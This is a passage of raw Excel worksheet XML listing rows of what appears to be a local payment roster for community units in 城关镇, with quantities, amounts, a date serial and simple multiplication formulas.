      <c r="B926" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C926" s="24" t="s">
        <v>2398</v>
      </c>
      <c r="D926" s="24" t="s">
        <v>2479</v>
      </c>
      <c r="E926" s="24" t="s">
        <v>2480</v>
      </c>
      <c r="F926" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G926" s="24">
        <v>1</v>
      </c>
      <c r="H926" s="25">
        <v>365</v>
      </c>
      <c r="I926" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J926" s="41">
        <v>45108</v>
      </c>
      <c r="K926" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="927" customHeight="1" spans="1:11">
      <c r="A927" s="23" t="s">
        <v>2481</v>
      </c>
      <c r="B927" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C927" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D927" s="24" t="s">
        <v>2482</v>
      </c>
      <c r="E927" s="24" t="s">
        <v>869</v>
      </c>
      <c r="F927" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G927" s="24">
        <v>1</v>
      </c>
      <c r="H927" s="25">
        <v>365</v>
      </c>
      <c r="I927" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J927" s="41">
        <v>45108</v>
      </c>
      <c r="K927" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="928" customHeight="1" spans="1:11">
      <c r="A928" s="23" t="s">
        <v>2483</v>
      </c>
      <c r="B928" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C928" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D928" s="24" t="s">
        <v>2484</v>
      </c>
      <c r="E928" s="24" t="s">
        <v>2253</v>
      </c>
      <c r="F928" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G928" s="24">
        <v>1</v>
      </c>
      <c r="H928" s="25">
        <v>365</v>
      </c>
      <c r="I928" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J928" s="41">
        <v>45108</v>
      </c>
      <c r="K928" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="929" customHeight="1" spans="1:11">
      <c r="A929" s="23" t="s">
        <v>2485</v>
      </c>
      <c r="B929" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C929" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D929" s="24" t="s">
        <v>2486</v>
      </c>
      <c r="E929" s="24" t="s">
        <v>370</v>
      </c>
      <c r="F929" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G929" s="24">
        <v>1</v>
      </c>
      <c r="H929" s="25">
        <v>365</v>
      </c>
      <c r="I929" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J929" s="41">
        <v>45108</v>
      </c>
      <c r="K929" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="930" customHeight="1" spans="1:11">
      <c r="A930" s="23" t="s">
        <v>2487</v>
      </c>
      <c r="B930" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C930" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D930" s="24" t="s">
        <v>2488</v>
      </c>
      <c r="E930" s="24" t="s">
        <v>2489</v>
      </c>
      <c r="F930" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G930" s="24">
        <v>1</v>
      </c>
      <c r="H930" s="25">
        <v>365</v>
      </c>
      <c r="I930" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J930" s="41">
        <v>45108</v>
      </c>
      <c r="K930" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="931" customHeight="1" spans="1:11">
      <c r="A931" s="23" t="s">
        <v>2490</v>
      </c>
      <c r="B931" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C931" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D931" s="24" t="s">
        <v>2491</v>
      </c>
      <c r="E931" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F931" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G931" s="24">
        <v>2</v>
      </c>
      <c r="H931" s="25">
        <v>325</v>
      </c>
      <c r="I931" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J931" s="41">
        <v>45108</v>
      </c>
      <c r="K931" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="932" customHeight="1" spans="1:11">
      <c r="A932" s="23" t="s">
        <v>2492</v>
      </c>
      <c r="B932" s="24" t="str">
        <f>B931</f>
        <v>城关镇</v>
      </c>
      <c r="C932" s="24" t="str">
        <f>C931</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D932" s="24" t="s">
        <v>2493</v>
      </c>
      <c r="E932" s="23" t="s">
        <v>2494</v>
      </c>
      <c r="F932" s="24" t="str">
        <f>F931</f>
        <v>4113210108</v>
      </c>
      <c r="G932" s="24"/>
      <c r="H932" s="24"/>
      <c r="I932" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J932" s="41"/>
      <c r="K932" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="933" customHeight="1" spans="1:11">
      <c r="A933" s="23" t="s">
        <v>2495</v>
      </c>
      <c r="B933" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C933" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D933" s="24" t="s">
        <v>2496</v>
      </c>
      <c r="E933" s="24" t="s">
        <v>397</v>
      </c>
      <c r="F933" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G933" s="24">
        <v>1</v>
      </c>
      <c r="H933" s="25">
        <v>365</v>
      </c>
      <c r="I933" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J933" s="41">
        <v>45108</v>
      </c>
      <c r="K933" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="934" customHeight="1" spans="1:11">
      <c r="A934" s="23" t="s">
        <v>2497</v>
      </c>
      <c r="B934" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C934" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D934" s="24" t="s">
        <v>2498</v>
      </c>
      <c r="E934" s="24" t="s">
        <v>2499</v>
      </c>
      <c r="F934" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G934" s="24">
        <v>1</v>
      </c>
      <c r="H934" s="25">
        <v>365</v>
      </c>
      <c r="I934" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J934" s="41">
        <v>45108</v>
      </c>
      <c r="K934" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="935" customHeight="1" spans="1:11">
      <c r="A935" s="23" t="s">
        <v>2500</v>
      </c>
      <c r="B935" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C935" s="24" t="s">
        <v>2337</v>
      </c>
      <c r="D935" s="24" t="s">
        <v>2501</v>
      </c>
      <c r="E935" s="24" t="s">
        <v>561</v>
      </c>
      <c r="F935" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G935" s="24">
        <v>1</v>
      </c>
      <c r="H935" s="25">
        <v>365</v>
      </c>
      <c r="I935" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J935" s="41">
        <v>45108</v>
      </c>
      <c r="K935" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="936" customHeight="1" spans="1:11">
      <c r="A936" s="23" t="s">
        <v>2502</v>
      </c>
      <c r="B936" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C936" s="24" t="s">
        <v>2503</v>
      </c>
      <c r="D936" s="24" t="s">
        <v>2504</v>
      </c>
      <c r="E936" s="24" t="s">
        <v>2505</v>
      </c>
      <c r="F936" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G936" s="24">
        <v>1</v>
      </c>
      <c r="H936" s="25">
        <v>365</v>
      </c>
      <c r="I936" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J936" s="41">
        <v>45108</v>
      </c>
      <c r="K936" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="937" customHeight="1" spans="1:11">
      <c r="A937" s="23" t="s">
        <v>2506</v>
      </c>
      <c r="B937" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C937" s="24" t="s">
        <v>2507</v>
      </c>
      <c r="D937" s="24" t="s">
        <v>2508</v>
      </c>
      <c r="E937" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F937" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G937" s="24">
        <v>1</v>
      </c>
      <c r="H937" s="25">
        <v>365</v>
      </c>
      <c r="I937" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J937" s="41">
        <v>45108</v>
      </c>
      <c r="K937" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="938" customHeight="1" spans="1:11">
      <c r="A938" s="23" t="s">
        <v>2509</v>
      </c>
      <c r="B938" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C938" s="24" t="s">
        <v>2337</v>
      </c>
      <c r="D938" s="24" t="s">
        <v>2510</v>
      </c>
      <c r="E938" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F938" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G938" s="24">
        <v>1</v>
      </c>
      <c r="H938" s="25">
        <v>365</v>
      </c>
      <c r="I938" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J938" s="41">
        <v>45108</v>
      </c>
      <c r="K938" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="939" customHeight="1" spans="1:11">
      <c r="A939" s="23" t="s">
        <v>2511</v>
      </c>
      <c r="B939" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C939" s="24" t="s">
        <v>2512</v>
      </c>
      <c r="D939" s="24" t="s">
        <v>2513</v>
      </c>
      <c r="E939" s="24" t="s">
        <v>980</v>
      </c>
      <c r="F939" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G939" s="24">
        <v>1</v>
      </c>
      <c r="H939" s="25">
        <v>365</v>
      </c>
      <c r="I939" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J939" s="41">
        <v>45108</v>
      </c>
      <c r="K939" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="940" customHeight="1" spans="1:11">
      <c r="A940" s="23" t="s">
        <v>2514</v>
      </c>
      <c r="B940" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C940" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D940" s="24" t="s">
        <v>2515</v>
      </c>
      <c r="E940" s="24" t="s">
        <v>2516</v>
      </c>
      <c r="F940" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G940" s="24">
        <v>2</v>
      </c>
      <c r="H940" s="25">
        <v>325</v>
      </c>
      <c r="I940" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J940" s="41">
        <v>45108</v>
      </c>
      <c r="K940" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="941" customHeight="1" spans="1:11">
      <c r="A941" s="23" t="s">
        <v>2517</v>
      </c>
      <c r="B941" s="24" t="str">
        <f>B940</f>
        <v>城关镇</v>
      </c>
      <c r="C941" s="24" t="str">
        <f>C940</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D941" s="23" t="s">
        <v>2518</v>
      </c>
      <c r="E941" s="23" t="s">
        <v>2519</v>
      </c>
      <c r="F941" s="24" t="str">
        <f>F940</f>
        <v>4113210108</v>
      </c>
      <c r="G941" s="24"/>
      <c r="H941" s="24"/>
      <c r="I941" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J941" s="41"/>
      <c r="K941" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="942" customHeight="1" spans="1:11">
      <c r="A942" s="23" t="s">
        <v>2520</v>
      </c>
      <c r="B942" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C942" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D942" s="24" t="s">
        <v>2521</v>
      </c>
      <c r="E942" s="24" t="s">
        <v>2522</v>
      </c>
      <c r="F942" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G942" s="24">
        <v>2</v>
      </c>
      <c r="H942" s="25">
        <v>325</v>
      </c>
      <c r="I942" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J942" s="41">
        <v>45108</v>
      </c>
      <c r="K942" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="943" customHeight="1" spans="1:11">
      <c r="A943" s="23" t="s">
        <v>2523</v>
      </c>
      <c r="B943" s="24" t="str">
        <f>B942</f>
        <v>城关镇</v>
      </c>
      <c r="C943" s="24" t="str">
        <f>C942</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D943" s="23" t="s">
        <v>2524</v>
      </c>
      <c r="E943" s="23" t="s">
        <v>2525</v>
      </c>
      <c r="F943" s="24" t="str">
        <f>F942</f>
        <v>4113210108</v>
      </c>
      <c r="G943" s="24"/>
      <c r="H943" s="24"/>
      <c r="I943" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J943" s="41"/>
      <c r="K943" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="944" customHeight="1" spans="1:11">
      <c r="A944" s="23" t="s">
        <v>2526</v>
      </c>
      <c r="B944" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C944" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D944" s="24" t="s">
        <v>2527</v>
      </c>
      <c r="E944" s="24" t="s">
        <v>572</v>
      </c>
      <c r="F944" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G944" s="24">
        <v>2</v>
      </c>
      <c r="H944" s="25">
        <v>325</v>
      </c>
      <c r="I944" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J944" s="41">
        <v>45108</v>
      </c>
      <c r="K944" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="945" customHeight="1" spans="1:11">
      <c r="A945" s="23" t="s">
        <v>2528</v>
      </c>
      <c r="B945" s="24" t="str">
        <f>B944</f>
        <v>城关镇</v>
      </c>
      <c r="C945" s="24" t="str">
        <f>C944</f>
        <v>中华社区外贸局</v>
      </c>
      <c r="D945" s="30" t="s">
        <v>2529</v>
      </c>
      <c r="E945" s="30" t="s">
        <v>2530</v>
      </c>
      <c r="F945" s="24" t="str">
        <f>F944</f>
        <v>4113210108</v>
      </c>
      <c r="G945" s="24"/>
      <c r="H945" s="24"/>
      <c r="I945" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J945" s="41"/>
      <c r="K945" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="946" customHeight="1" spans="1:11">
      <c r="A946" s="23" t="s">
        <v>2531</v>
      </c>
      <c r="B946" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C946" s="24" t="s">
        <v>2532</v>
      </c>
      <c r="D946" s="24" t="s">
        <v>2533</v>
      </c>
      <c r="E946" s="24" t="s">
        <v>292</v>
      </c>
      <c r="F946" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G946" s="24">
        <v>1</v>
      </c>
      <c r="H946" s="25">
        <v>365</v>
      </c>
      <c r="I946" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J946" s="41">
        <v>45108</v>
      </c>
      <c r="K946" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="947" customHeight="1" spans="1:11">
      <c r="A947" s="23" t="s">
        <v>2534</v>
      </c>
      <c r="B947" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C947" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D947" s="24" t="s">
        <v>2535</v>
      </c>
      <c r="E947" s="24" t="s">
        <v>866</v>
      </c>
      <c r="F947" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G947" s="24">
        <v>1</v>
      </c>
      <c r="H947" s="25">
        <v>365</v>
      </c>
      <c r="I947" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J947" s="41">
        <v>45108</v>
      </c>
      <c r="K947" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="948" customHeight="1" spans="1:11">
      <c r="A948" s="23" t="s">
        <v>2536</v>
      </c>
      <c r="B948" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C948" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D948" s="24" t="s">
        <v>2537</v>
      </c>
      <c r="E948" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F948" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G948" s="24">
        <v>2</v>
      </c>
      <c r="H948" s="25">
        <v>365</v>
      </c>
      <c r="I948" s="24">
        <f t="shared" si="14"/>
        <v>730</v>
      </c>
      <c r="J948" s="41">
        <v>45108</v>
      </c>
      <c r="K948" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="949" customHeight="1" spans="1:11">
      <c r="A949" s="23" t="s">
        <v>2538</v>
      </c>
      <c r="B949" s="24" t="str">
        <f>B948</f>
        <v>城关镇</v>
      </c>
      <c r="C949" s="24" t="str">
        <f>C948</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D949" s="27" t="s">
        <v>2539</v>
      </c>
      <c r="E949" s="27" t="s">
        <v>343</v>
      </c>
      <c r="F949" s="24" t="str">
        <f>F948</f>
        <v>4113210108</v>
      </c>
      <c r="G949" s="24"/>
      <c r="H949" s="24"/>
      <c r="I949" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J949" s="41"/>
      <c r="K949" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="950" customHeight="1" spans="1:11">
      <c r="A950" s="23" t="s">
        <v>2540</v>
      </c>
      <c r="B950" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C950" s="24" t="s">
        <v>2313</v>
      </c>
      <c r="D950" s="24" t="s">
        <v>2541</v>
      </c>
      <c r="E950" s="24" t="s">
        <v>236</v>
      </c>
      <c r="F950" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G950" s="24">
        <v>2</v>
      </c>
      <c r="H950" s="25">
        <v>345</v>
      </c>
      <c r="I950" s="24">
        <f t="shared" si="14"/>
        <v>690</v>
      </c>
      <c r="J950" s="41">
        <v>45108</v>
      </c>
      <c r="K950" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="951" customHeight="1" spans="1:11">
      <c r="A951" s="23" t="s">
        <v>2542</v>
      </c>
      <c r="B951" s="24" t="str">
        <f>B950</f>
        <v>城关镇</v>
      </c>
      <c r="C951" s="24" t="str">
        <f>C950</f>
        <v>中华社区工信局</v>
      </c>
      <c r="D951" s="31" t="s">
        <v>2543</v>
      </c>
      <c r="E951" s="31" t="s">
        <v>1866</v>
      </c>
      <c r="F951" s="24" t="str">
        <f>F950</f>
        <v>4113210108</v>
      </c>
      <c r="G951" s="24"/>
      <c r="H951" s="24"/>
      <c r="I951" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J951" s="41"/>
      <c r="K951" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="952" customHeight="1" spans="1:11">
      <c r="A952" s="23" t="s">
        <v>2544</v>
      </c>
      <c r="B952" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C952" s="24" t="s">
        <v>2304</v>
      </c>
      <c r="D952" s="24" t="s">
        <v>2545</v>
      </c>
      <c r="E952" s="24" t="s">
        <v>2546</v>
      </c>
      <c r="F952" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G952" s="24">
        <v>2</v>
      </c>
      <c r="H952" s="25">
        <v>325</v>
      </c>
      <c r="I952" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J952" s="41">
        <v>45108</v>
      </c>
      <c r="K952" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="953" customHeight="1" spans="1:11">
      <c r="A953" s="23" t="s">
        <v>2547</v>
      </c>
      <c r="B953" s="24" t="str">
        <f>B952</f>
        <v>城关镇</v>
      </c>
      <c r="C953" s="24" t="str">
        <f>C952</f>
        <v>中华社区物资局</v>
      </c>
      <c r="D953" s="23" t="s">
        <v>2548</v>
      </c>
      <c r="E953" s="24" t="s">
        <v>2549</v>
      </c>
      <c r="F953" s="24" t="str">
        <f>F952</f>
        <v>4113210108</v>
      </c>
      <c r="G953" s="24"/>
      <c r="H953" s="24"/>
      <c r="I953" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J953" s="41"/>
      <c r="K953" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="954" customHeight="1" spans="1:11">
      <c r="A954" s="23" t="s">
        <v>2550</v>
      </c>
      <c r="B954" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C954" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D954" s="24" t="s">
        <v>2551</v>
      </c>
      <c r="E954" s="24" t="s">
        <v>2552</v>
      </c>
      <c r="F954" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G954" s="24">
        <v>2</v>
      </c>
      <c r="H954" s="25">
        <v>325</v>
      </c>
      <c r="I954" s="24">
        <f t="shared" si="14"/>
        <v>650</v>
      </c>
      <c r="J954" s="41">
        <v>45108</v>
      </c>
      <c r="K954" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="955" customHeight="1" spans="1:11">
      <c r="A955" s="23" t="s">
        <v>2553</v>
      </c>
      <c r="B955" s="24" t="str">
        <f>B954</f>
        <v>城关镇</v>
      </c>
      <c r="C955" s="24" t="str">
        <f>C954</f>
        <v>中华社区商业中心</v>
      </c>
      <c r="D955" s="23" t="s">
        <v>2554</v>
      </c>
      <c r="E955" s="23" t="s">
        <v>2555</v>
      </c>
      <c r="F955" s="24" t="str">
        <f>F954</f>
        <v>4113210108</v>
      </c>
      <c r="G955" s="24"/>
      <c r="H955" s="24"/>
      <c r="I955" s="24">
        <f t="shared" si="14"/>
        <v>0</v>
      </c>
      <c r="J955" s="41"/>
      <c r="K955" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="956" customHeight="1" spans="1:11">
      <c r="A956" s="23" t="s">
        <v>2556</v>
      </c>
      <c r="B956" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C956" s="24" t="s">
        <v>2401</v>
      </c>
      <c r="D956" s="24" t="s">
        <v>2557</v>
      </c>
      <c r="E956" s="24" t="s">
        <v>2356</v>
      </c>
      <c r="F956" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G956" s="24">
        <v>1</v>
      </c>
      <c r="H956" s="25">
        <v>365</v>
      </c>
      <c r="I956" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J956" s="41">
        <v>45108</v>
      </c>
      <c r="K956" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="957" customHeight="1" spans="1:11">
      <c r="A957" s="23" t="s">
        <v>2558</v>
      </c>
      <c r="B957" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C957" s="24" t="s">
        <v>2345</v>
      </c>
      <c r="D957" s="24" t="s">
        <v>2559</v>
      </c>
      <c r="E957" s="24" t="s">
        <v>1668</v>
      </c>
      <c r="F957" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G957" s="24">
        <v>1</v>
      </c>
      <c r="H957" s="25">
        <v>365</v>
      </c>
      <c r="I957" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J957" s="41">
        <v>45108</v>
      </c>
      <c r="K957" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="958" customHeight="1" spans="1:11">
      <c r="A958" s="23" t="s">
        <v>2560</v>
      </c>
      <c r="B958" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C958" s="24" t="s">
        <v>2398</v>
      </c>
      <c r="D958" s="24" t="s">
        <v>2561</v>
      </c>
      <c r="E958" s="24" t="s">
        <v>288</v>
      </c>
      <c r="F958" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G958" s="24">
        <v>1</v>
      </c>
      <c r="H958" s="25">
        <v>365</v>
      </c>
      <c r="I958" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J958" s="41">
        <v>45108</v>
      </c>
      <c r="K958" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="959" customHeight="1" spans="1:11">
      <c r="A959" s="23" t="s">
        <v>2562</v>
      </c>
      <c r="B959" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C959" s="24" t="s">
        <v>2398</v>
      </c>
      <c r="D959" s="24" t="s">
        <v>2563</v>
      </c>
      <c r="E959" s="24" t="s">
        <v>346</v>
      </c>
      <c r="F959" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G959" s="24">
        <v>1</v>
      </c>
      <c r="H959" s="25">
        <v>365</v>
      </c>
      <c r="I959" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J959" s="41">
        <v>45108</v>
      </c>
      <c r="K959" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="960" customHeight="1" spans="1:11">
      <c r="A960" s="23" t="s">
        <v>2564</v>
      </c>
      <c r="B960" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C960" s="24" t="s">
        <v>2401</v>
      </c>
      <c r="D960" s="24" t="s">
        <v>2565</v>
      </c>
      <c r="E960" s="24" t="s">
        <v>2566</v>
      </c>
      <c r="F960" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G960" s="24">
        <v>1</v>
      </c>
      <c r="H960" s="25">
        <v>365</v>
      </c>
      <c r="I960" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J960" s="41">
        <v>45108</v>
      </c>
      <c r="K960" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="961" customHeight="1" spans="1:11">
      <c r="A961" s="23" t="s">
        <v>2567</v>
      </c>
      <c r="B961" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C961" s="24" t="s">
        <v>2503</v>
      </c>
      <c r="D961" s="24" t="s">
        <v>2568</v>
      </c>
      <c r="E961" s="24" t="s">
        <v>2569</v>
      </c>
      <c r="F961" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G961" s="24">
        <v>1</v>
      </c>
      <c r="H961" s="25">
        <v>365</v>
      </c>
      <c r="I961" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J961" s="41">
        <v>45108</v>
      </c>
      <c r="K961" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="962" customHeight="1" spans="1:11">
      <c r="A962" s="23" t="s">
        <v>2570</v>
      </c>
      <c r="B962" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C962" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D962" s="24" t="s">
        <v>2571</v>
      </c>
      <c r="E962" s="24" t="s">
        <v>2572</v>
      </c>
      <c r="F962" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G962" s="24">
        <v>1</v>
      </c>
      <c r="H962" s="25">
        <v>365</v>
      </c>
      <c r="I962" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J962" s="41">
        <v>45108</v>
      </c>
      <c r="K962" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="963" customHeight="1" spans="1:11">
      <c r="A963" s="23" t="s">
        <v>2573</v>
      </c>
      <c r="B963" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C963" s="24" t="s">
        <v>2401</v>
      </c>
      <c r="D963" s="24" t="s">
        <v>2574</v>
      </c>
      <c r="E963" s="24" t="s">
        <v>2575</v>
      </c>
      <c r="F963" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G963" s="24">
        <v>1</v>
      </c>
      <c r="H963" s="25">
        <v>365</v>
      </c>
      <c r="I963" s="24">
        <f t="shared" si="14"/>
        <v>365</v>
      </c>
      <c r="J963" s="41">
        <v>45108</v>
      </c>
      <c r="K963" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="964" customHeight="1" spans="1:11">
      <c r="A964" s="23" t="s">
        <v>2576</v>
      </c>
      <c r="B964" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C964" s="24" t="s">
        <v>2362</v>
      </c>
      <c r="D964" s="24" t="s">
        <v>2577</v>
      </c>
      <c r="E964" s="24" t="s">
        <v>323</v>
      </c>
      <c r="F964" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G964" s="24">
        <v>1</v>
      </c>
      <c r="H964" s="25">
        <v>365</v>
      </c>
      <c r="I964" s="24">
        <f t="shared" ref="I964:I1027" si="15">H964*G964</f>
        <v>365</v>
      </c>
      <c r="J964" s="41">
        <v>45108</v>
      </c>
      <c r="K964" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="965" customHeight="1" spans="1:11">
      <c r="A965" s="23" t="s">
        <v>2578</v>
      </c>
      <c r="B965" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C965" s="24" t="s">
        <v>2579</v>
      </c>
      <c r="D965" s="24" t="s">
        <v>2580</v>
      </c>
      <c r="E965" s="24" t="s">
        <v>2581</v>
      </c>
      <c r="F965" s="24" t="s">
        <v>2582</v>
      </c>
      <c r="G965" s="24">
        <v>1</v>
      </c>
      <c r="H965" s="25">
        <v>365</v>
      </c>
      <c r="I965" s="24">
        <f t="shared" si="15"/>
        <v>365</v>
      </c>
      <c r="J965" s="41">
        <v>45108</v>
      </c>
      <c r="K965" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="966" customHeight="1" spans="1:11">
      <c r="A966" s="23" t="s">
        <v>2583</v>
      </c>
      <c r="B966" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C966" s="24" t="s">
        <v>2584</v>
      </c>
      <c r="D966" s="24" t="s">
